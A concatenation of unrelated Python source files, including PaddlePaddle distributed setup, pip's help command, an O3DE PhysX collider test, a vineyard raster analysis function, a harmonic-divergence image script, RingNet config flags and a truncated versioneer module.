"environment variable %s is needed, but not set." %
var_name)
if core.is_compiled_with_cuda():
_check_var_exists("FLAGS_selected_gpus")
elif core.is_compiled_with_xpu():
_check_var_exists('FLAGS_selected_xpus')
_check_var_exists("PADDLE_TRAINER_ID")
_check_var_exists("PADDLE_CURRENT_ENDPOINT")
_check_var_exists("PADDLE_TRAINERS_NUM")
_check_var_exists("PADDLE_TRAINER_ENDPOINTS")
# 3: init gloo context (step 1: httpsever start)
init_gloo = int(os.getenv("PADDLE_WITH_GLOO", "0"))
if init_gloo:
ep_rank_0 = parallel_env.trainer_endpoints[0].split(":")
manager = Manager()
# glboal dict to store status
http_server_d = manager.dict()
http_server_d["running"] = False
if parallel_env.rank == 0:
# The scope for worker used by http server is '_worker'
size = {'_worker': parallel_env.world_size}
http_server = Process(
target=_start_kv_server,
args=(int(ep_rank_0[1]), http_server_d, size))
http_server.daemon = True
http_server_d["running"] = True
http_server.start()
# 4. init NCCL ParallelStrategy
strategy = ParallelStrategy()
if parallel_helper._is_parallel_ctx_initialized():
warnings.warn("The parallel environment has been initialized.")
strategy.nranks = parallel_env.world_size
strategy.local_rank = parallel_env.rank
strategy.trainer_endpoints = parallel_env.trainer_endpoints
strategy.current_endpoint = parallel_env.current_endpoint
strategy.nrings = parallel_env.nrings
# NOTE(chenweihang): [ why config global place here? ]
# the dygraph mode will be set to default mode,
# users will not call `dygraph.guard` or `enable_dygraph`
# directly, if they want to switch default place,
# they need to call a function to change default place,
# here just set correctly place to users
if core.is_compiled_with_cuda():
place = core.CUDAPlace(parallel_env.device_id)
elif core.is_compiled_with_xpu():
place = core.XPUPlace(parallel_env.device_id)
_set_expected_place(place)
# init nccl or bkcl context
if core.is_compiled_with_cuda():
parallel_helper._set_parallel_ctx(
core.NCCLParallelContext(strategy, place))
elif core.is_compiled_with_xpu():
parallel_helper._set_parallel_ctx(
core.BKCLParallelContext(strategy, place))
other_endpoints = strategy.trainer_endpoints[:]
other_endpoints.remove(strategy.current_endpoint)
if strategy.local_rank == 0:
wait_server_ready(other_endpoints)
parallel_helper._init_parallel_ctx()
# 5: init gloo context (step 2: gloo init)
# dividing init_gloo into two part beacause nccl and gloo
# are separately looking for free ports which sometimes
# leads to port-conflict.
if init_gloo:
wait_server_ready([parallel_env.trainer_endpoints[0]])
gloo_strategy = core.GlooParallelStrategy()
gloo_strategy.rank = parallel_env.rank
gloo_strategy.rank_num = parallel_env.world_size
gloo_strategy.ip_address = ep_rank_0[0]
gloo_strategy.ip_port = int(ep_rank_0[1])
default_init_timeout_seconds = 3600
default_run_timeout_seconds = 9999999
gloo_strategy.init_seconds = default_init_timeout_seconds
gloo_strategy.run_seconds = default_run_timeout_seconds
gloo = core.GlooParallelContext(gloo_strategy)
gloo.init()
if parallel_env.rank == 0:
http_server_d["running"] = False
http_server.join()
def get_rank():
"""
Returns the rank of current trainer.
Its value is equal to the value of the environment variable ``PADDLE_TRAINER_ID`` .
The default value is 0.
Returns:
(int) The rank of current trainer.
Examples:
.. code-block:: python
import paddle
import paddle.distributed as dist
# execute this command in terminal: export PADDLE_TRAINER_ID=0
print("The rank is %d" % dist.get_rank())
# The rank is 0
"""
return _get_global_parallel_env().rank
def get_world_size():
"""
Returns the number of trainers (number of processes participating in current job).
Its value is equal to the value of the environment variable ``PADDLE_TRAINERS_NUM`` .
The default value is 1.
Returns:
(int) The number of trainers.
Examples:
.. code-block:: python
import paddle
import paddle.distributed as dist
# execute this command in terminal: export PADDLE_TRAINERS_NUM=4
print("The world_size is %d" % dist.get_world_size())
# The world_size is 4
"""
return _get_global_parallel_env().world_size
|
the-stack_0_12439 |
from pip._internal.cli.base_command import Command
from pip._internal.cli.status_codes import SUCCESS
from pip._internal.exceptions import CommandError
class HelpCommand(Command):
"""Show help for commands"""
name = 'help'
usage = """
%prog <command>"""
summary = 'Show help for commands.'
ignore_require_venv = True
def run(self, options, args):
from pip._internal.commands import commands_dict, get_similar_commands
try:
# 'pip help' with no args is handled by pip.__init__.parseopt()
cmd_name = args[0] # the command we need help for
except IndexError:
return SUCCESS
if cmd_name not in commands_dict:
guess = get_similar_commands(cmd_name)
msg = ['unknown command "%s"' % cmd_name]
if guess:
msg.append('maybe you meant "%s"' % guess)
raise CommandError(' - '.join(msg))
command = commands_dict[cmd_name]()
command.parser.print_help()
return SUCCESS
|
the-stack_0_12441 | """
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
Test case ID : C14861501
Test Case Title : Verify PxMesh is auto-assigned when Collider component is added after Rendering Mesh component
"""
# fmt: off
class Tests():
create_entity = ("Created test entity", "Failed to create test entity")
mesh_added = ("Added Mesh component", "Failed to add Mesh component")
physx_collider_added = ("Added PhysX Collider component", "Failed to add PhysX Collider component")
assign_mesh_asset = ("Assigned Mesh asset to Mesh component", "Failed to assign mesh asset to Mesh component")
automatic_shape_change = ("Shape was changed automatically", "Shape failed to change automatically")
# fmt: on
def C14861501_PhysXCollider_RenderMeshAutoAssigned():
"""
Summary:
Create entity with Mesh component and assign a render mesh to the Mesh component. Add Physics Collider component
and Verify that the physics mesh asset is auto-assigned.
Expected Behavior:
The physics asset in PhysX Collider component is auto-assigned
Test Steps:
1) Load the empty level
2) Create an entity
3) Add Mesh component
4) Assign a render mesh asset to Mesh component (the fbx mesh having both Static mesh and PhysX collision Mesh)
5) Add PhysX Collider component
6) The physics asset in PhysX Collider component is auto-assigned.
Note:
- This test file must be called from the Open 3D Engine Editor command terminal
- Any passed and failed tests are written to the Editor.log file.
Parsing the file or running a log_monitor are required to observe the test results.
:return: None
"""
# Builtins
import os
# Helper Files
import ImportPathHelper as imports
imports.init()
from editor_python_test_tools.editor_entity_utils import EditorEntity as Entity
from editor_python_test_tools.utils import Report
from editor_python_test_tools.utils import TestHelper as helper
from asset_utils import Asset
# Asset paths
STATIC_MESH = os.path.join("assets", "c14861501_physxcollider_rendermeshautoassigned", "spherebot", "r0-b_body.azmodel")
PHYSX_MESH = os.path.join(
"assets", "c14861501_physxcollider_rendermeshautoassigned", "spherebot", "r0-b_body.pxmesh"
)
helper.init_idle()
# 1) Load the empty level
helper.open_level("Physics", "Base")
# 2) Create an entity
test_entity = Entity.create_editor_entity("test_entity")
Report.result(Tests.create_entity, test_entity.id.IsValid())
# 3) Add Mesh component
mesh_component = test_entity.add_component("Mesh")
Report.result(Tests.mesh_added, test_entity.has_component("Mesh"))
# 4) Assign a render mesh asset to Mesh component (the fbx mesh having both Static mesh and PhysX collision Mesh)
mesh_asset = Asset.find_asset_by_path(STATIC_MESH)
mesh_component.set_component_property_value("Controller|Configuration|Mesh Asset", mesh_asset.id)
mesh_asset.id = mesh_component.get_component_property_value("Controller|Configuration|Mesh Asset")
Report.result(Tests.assign_mesh_asset, mesh_asset.get_path() == STATIC_MESH.replace(os.sep, "/"))
# 5) Add PhysX Collider component
test_component = test_entity.add_component("PhysX Collider")
Report.result(Tests.physx_collider_added, test_entity.has_component("PhysX Collider"))
# 6) The physics asset in PhysX Collider component is auto-assigned.
asset_id = test_component.get_component_property_value("Shape Configuration|Asset|PhysX Mesh")
test_asset = Asset(asset_id)
Report.result(Tests.automatic_shape_change, test_asset.get_path() == PHYSX_MESH.replace(os.sep, "/"))
if __name__ == "__main__":
import ImportPathHelper as imports
imports.init()
from editor_python_test_tools.utils import Report
Report.start_test(C14861501_PhysXCollider_RenderMeshAutoAssigned)
|
the-stack_0_12442 | import numpy as np
class VineyardAnalysis():
def __init__(self):
self.name = "Vineyard Suitability Analysis Function"
self.description = "This function computes vineyard suitability given elevation, slope, aspect, and soil-type rasters."
def getParameterInfo(self):
return [
{
'name': 'elevation',
'dataType': 'raster',
'value': None,
'required': True,
'displayName': 'Elevation Raster',
'description': "The primary single-band raster where pixel values represent elevation in meters."
},
{
'name': 'slope',
'dataType': 'raster',
'value': None,
'required': True,
'displayName': 'Slope Raster',
'description': "A single-band raster where pixel values represent slope."
},
{
'name': 'aspect',
'dataType': 'raster',
'value': None,
'required': True,
'displayName': 'Aspect Raster',
'description': "A single-band raster where pixel values represent aspect."
},
{
'name': 'soiltype',
'dataType': 'raster',
'value': None,
'required': False,
'displayName': 'Soil Type Raster',
'description': "A single-band thematic raster where pixel values represent soil type."
},
]
def getConfiguration(self, **scalars):
return {
'inheritProperties': 2 | 4 | 8, # inherit all but the pixel type from the input raster
'invalidateProperties': 2 | 4 | 8, # reset any statistics and histogram that might be held by the parent dataset (because this function modifies pixel values).
'inputMask': True # We need the input raster mask in .updatePixels().
}
def updateRasterInfo(self, **kwargs):
kwargs['output_info']['bandCount'] = 1
kwargs['output_info']['pixelType'] = 'u1'
kwargs['output_info']['statistics'] = ({'minimum': 0, 'maximum': 3}, )
kwargs['output_info']['noData'] = np.array([0], 'u1')
return kwargs
def updatePixels(self, tlc, shape, props, **pixelBlocks):
elev = np.array(pixelBlocks['elevation_pixels'], 'f4')
slope = np.array(pixelBlocks['slope_pixels'], 'f4')
aspect = np.array(pixelBlocks['aspect_pixels'], 'f4')
#soil = np.array(pixelBlocks['soiltype_pixels'], 'i8')
E = (elev > 30).astype('u1') & (elev < 400).astype('u1')
S = (slope > 5).astype('u1') & (slope < 60).astype('u1')
A = (aspect > 0).astype('u1') & (aspect < 200).astype('u1')
pixelBlocks['output_pixels'] = (E + S + A).astype(props['pixelType'])
return pixelBlocks
def updateKeyMetadata(self, names, bandIndex, **keyMetadata):
if bandIndex == -1:
keyMetadata['datatype'] = 'Scientific'
keyMetadata['variable'] = 'VineyardSuitability'
elif bandIndex == 0:
keyMetadata['wavelengthmin'] = None # reset inapplicable band-specific key metadata
keyMetadata['wavelengthmax'] = None
keyMetadata['bandname'] = 'VineyardSuitability'
return keyMetadata
|
the-stack_0_12443 | # -*- coding: utf-8 -*-
"""
Created on Tue Feb 19 16:54:54 2019
@author: similarities
"""
import matplotlib.pyplot as plt
import numpy as np
import os
class FwhmImageProcessing:
def __init__(self, filename, lambda_fundamental, maximum_harmonic, harmonic_number):
self.filename = filename
self.filedescription = self.filename[31:42] + '_' + self.filename[-6:-4]
self.y_min = 0
self.y_max = 2048
self.x_min = 150
self.x_max = 1300
self.picture = np.empty([])
self.harmonic_selected = harmonic_number
self.x_backsubstracted = np.empty([2048, 2048])
self.lambda_fundamental = lambda_fundamental
self.line_out = np.zeros([self.y_max, 1])
self.line_out_x = np.arange(self.x_min, self.x_max)
self.calibration_to_msr = 17.5 / 2048
self.full_divergence = 17.5
self.normalization_factor_mrad = np.zeros([20, 1])
self.border_up, self.border_down = self.energy_range()
self.maximum_harmonic = maximum_harmonic
self.result_array = np.zeros([self.maximum_harmonic, 5])
def open_file(self):
self.picture = plt.imread(self.filename)
return self.picture
def background_y(self):
back_mean = np.mean(self.picture[:, 1600:1700], axis=1)
for x in range(0, self.y_max):
self.x_backsubstracted[::, x] = self.picture[::, x] - back_mean[x]
self.background_x()
plt.figure(1)
# plt.ylim(100, 1000)
plt.imshow(self.x_backsubstracted)
plt.vlines(self.x_min, 0, 2048)
plt.vlines(self.x_max, 0, 2048)
return self.x_backsubstracted
def background_x(self):
back_mean = np.mean(self.picture[1880:1948, :], axis=0)
for x in range(0, 2048):
self.x_backsubstracted[x, ::] = self.picture[x, ::] - back_mean[x]
return self.x_backsubstracted
def energy_range(self):
print(self.harmonic_selected, ':')
previous_harmonic = self.lambda_fundamental / (self.harmonic_selected - 0.3)
next_harmonic = self.lambda_fundamental / (self.harmonic_selected + 0.3)
self.border_up = np.int(self.nm_in_px(previous_harmonic))
self.border_down = np.int(self.nm_in_px(next_harmonic))
print(self.border_up, self.border_down, "ROI in px")
self.pixel_range = np.int(self.border_down - self.border_up)
print(self.pixel_range, 'ROI in pixel range')
self.plot_roi_on_image()
return self.border_up, self.border_down
def nm_in_px(self, px_in):
return int(4.71439193e-01 * px_in ** 2 - 1.06651902e+02 * px_in + 4.29603367e+03)
def plot_roi_on_image(self):
plt.figure(1)
plt.hlines(self.border_up, xmin=0, xmax=2048, color="w", linewidth=0.1)
plt.hlines(self.border_down, xmin=0, xmax=2048, color="g", linewidth=0.1)
def sum_over_pixel_range_y(self):
self.line_out = self.x_backsubstracted[self.border_up: self.border_down, ::]
self.line_out = np.sum(self.line_out, axis=0)
self.line_out = self.line_out[self.x_min:self.x_max]
return self.line_out
def correction_background(self, value):
self.line_out[::] = self.line_out[::] - value
return self.line_out
def integrated_signal_in_lineout(self):
integrated = np.sum(self.line_out[::])
return integrated
def plot_x_y(self, x, y, name, plot_number, axis_x_name, axis_y_name):
plt.figure(plot_number)
plt.plot(x, y, label=name)
plt.xlabel(str(axis_x_name))
plt.ylabel(str(axis_y_name))
plt.legend()
def calibrate_px_to_msr(self, array_x):
array_x[::] = array_x[::] * self.calibration_to_msr
return array_x
def prepare_for_stepfunction(self):
self.sum_over_pixel_range_y()
maximum = np.amax(self.line_out[::])
minimum = np.amin(self.line_out[::])
if minimum < 0:
self.correction_background(minimum)
maximum = np.amax(self.line_out[::])
minimum = np.amin(self.line_out[::])
half_max = (maximum - minimum) / 2
# self.plot_x_y(self.line_out_x, self.line_out, 'linout_corrected', 2, 'px', 'counts')
self.plot_x_y(self.line_out_x, self.line_out, str(self.harmonic_selected), 2, 'px', 'counts')
return half_max
def step_function_for_fwhm(self):
half_max = self.prepare_for_stepfunction()
# width of step function is FWHM
d = np.sign(half_max - self.line_out[::]) - 1
self.line_out_x = self.calibrate_px_to_msr(self.line_out_x)
self.plot_x_y(self.line_out_x, d, 'stepfunction', 3, 'mrad', 'value')
self.line_out_x = np.arange(self.x_min, self.x_max)
result_FWHM = 1. * self.calibration_to_msr * (np.amax(np.nonzero(d)) - np.amin(np.nonzero(d)))
return result_FWHM
def px_in_nm(self, px_number):
return 1.24679344e-06 * px_number ** 2 - 1.65566701e-02 * px_number + 5.22598053e+01
def delta_energy(self):
delta = self.px_in_nm(self.border_up) - self.px_in_nm(self.border_down)
energy_nm = (self.lambda_fundamental / self.harmonic_selected)
delta_vs_energy = delta / energy_nm
return energy_nm, delta_vs_energy
def batch_over_N(self):
for x in range(self.harmonic_selected, self.maximum_harmonic):
self.result_array[x, 0] = x
self.harmonic_selected = x
self.energy_range()
self.result_array[x, 1] = self.step_function_for_fwhm()
self.result_array[x, 2] = np.sum(self.line_out[::])
self.result_array[x, 4], self.result_array[x, 3] = self.delta_energy()
# clean for empty entries
self.result_array = np.delete(self.result_array, np.where(~self.result_array.any(axis=1))[0],
axis=0)
self.plot_scatter(self.result_array[::, 0], self.result_array[::, 1], self.filedescription,
'harmonic number N', 'divergence in mrad', 5)
self.save_data()
return self.result_array
def plot_scatter(self, x, y, name, axis_name_x, axis_name_y, plot_number):
plt.figure(plot_number)
plt.scatter(x, y, label=name)
plt.xlabel(axis_name_x)
plt.ylabel(axis_name_y)
#plt.legend()
def prepare_header(self):
self.integrated_signal_in_lineout()
self.delta_energy()
# insert header line and change index
header_names = (['harmonic_number', 'mrad', 'integrated_counts_in_delta_E', 'harmonic_in_nm', 'delta_E/E'])
parameter_info = (
['fundamental_nm:', str(self.lambda_fundamental), 'pixel_range:', str(self.border_down-self.border_up), 'xxxx'])
return np.vstack((header_names, self.result_array, parameter_info))
def save_data(self):
result = self.prepare_header()
plt.figure(1)
plt.savefig(self.filedescription + "_raw_roi_" + ".png", bbox_inches="tight", dpi=1000)
plt.figure(2)
plt.savefig(self.filedescription + "_integrated_lineout" + ".png", bbox_inches="tight", dpi=1000)
plt.figure(5)
plt.savefig(self.filedescription + "_div_mrad_FWHM" + ".png", bbox_inches="tight", dpi=1000)
print('saved data')
np.savetxt(self.filedescription + ".txt", result, delimiter=' ',
header='string', comments='',
fmt='%s')
def get_file_list(path_picture):
tif_files = []
counter = 0
for file in os.listdir(path_picture):
print(file)
try:
if file.endswith(".tif"):
tif_files.append(str(file))
counter = counter + 1
else:
print("only other files found")
except Exception as e:
raise e
print("no files found here")
return tif_files
def process_files(my_files, path):
for x in range(63, 64):
file = path +'/'+ my_files[x]
Processing_Picture = FwhmImageProcessing(file, 805 , 30, 17)
Processing_Picture.open_file()
Processing_Picture.background_y()
Processing_Picture.batch_over_N()
Processing_Picture.save_data()
plt.close(1)
plt.close(2)
plt.close(5)
my_files = get_file_list('rotated_20190123')
process_files(my_files, 'rotated_20190123')
|
the-stack_0_12445 | """
Author: Soubhik Sanyal
Copyright (c) 2019, Soubhik Sanyal
All rights reserved.
Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG) is holder of all proprietary rights on this
computer program.
You can only use this computer program if you have closed a license agreement with MPG or you get the right to use
the computer program from someone who is authorized to grant you that right.
Any use of the computer program without a valid license is prohibited and liable to prosecution.
Copyright 2019 Max-Planck-Gesellschaft zur Foerderung der Wissenschaften e.V. (MPG). acting on behalf of its
Max Planck Institute for Intelligent Systems and the Max Planck Institute for Biological Cybernetics.
All rights reserved.
More information about RingNet is available at https://ringnet.is.tue.mpg.de.
based on github.com/akanazawa/hmr
"""
# Sets default args
# Note all data format is NHWC because slim resnet wants NHWC.
import sys
from absl import flags
PRETRAINED_MODEL = './model.pkl'
flags.DEFINE_string('img_path', '/training_set/NoW_Dataset/final_release_version/iphone_pictures/FaMoS_180424_033335_TA/selfie/IMG_0092.jpg', 'Image to run')
flags.DEFINE_string('out_folder', './output',
'The output path to store images')
flags.DEFINE_boolean('save_obj_file', True,
'If true the output meshes will be saved')
flags.DEFINE_boolean('save_flame_parameters', True,
'If true the camera and flame parameters will be saved')
flags.DEFINE_boolean('neutralize_expression', True,
'If true the camera and flame parameters will be saved')
flags.DEFINE_boolean('save_texture', True,
'If true the texture map will be stored')
flags.DEFINE_string('flame_model_path', './flame_model/generic_model.pkl', 'path to the neutral FLAME model')
flags.DEFINE_string('flame_texture_data_path', './flame_model/texture_data_512.npy', 'path to the FLAME texture data')
flags.DEFINE_string('load_path', PRETRAINED_MODEL, 'path to trained model')
flags.DEFINE_integer('batch_size', 1,
'Fixed to 1 for inference')
# Don't change if testing:
flags.DEFINE_integer('img_size', 224,
'Input image size to the network after preprocessing')
flags.DEFINE_string('data_format', 'NHWC', 'Data format')
# Flame parameters:
flags.DEFINE_integer('pose_params', 6,
'number of flame pose parameters')
flags.DEFINE_integer('shape_params', 100,
'number of flame shape parameters')
flags.DEFINE_integer('expression_params', 50,
'number of flame expression parameters')
def get_config():
config = flags.FLAGS
config(sys.argv)
return config
|
the-stack_0_12446 |
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = ""
cfg.parentdir_prefix = "None"
cfg.versionfile_source = "resp2/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %s but none started with prefix %s" %
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
"--always", "--long",
"--match", "%s*" % tag_prefix],
cwd=root)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[:git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = ("unable to parse git-describe output: '%s'"
% describe_out)
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
% (full_tag, tag_prefix))
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix):]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
cwd=root)[0].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"],
pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Eexceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
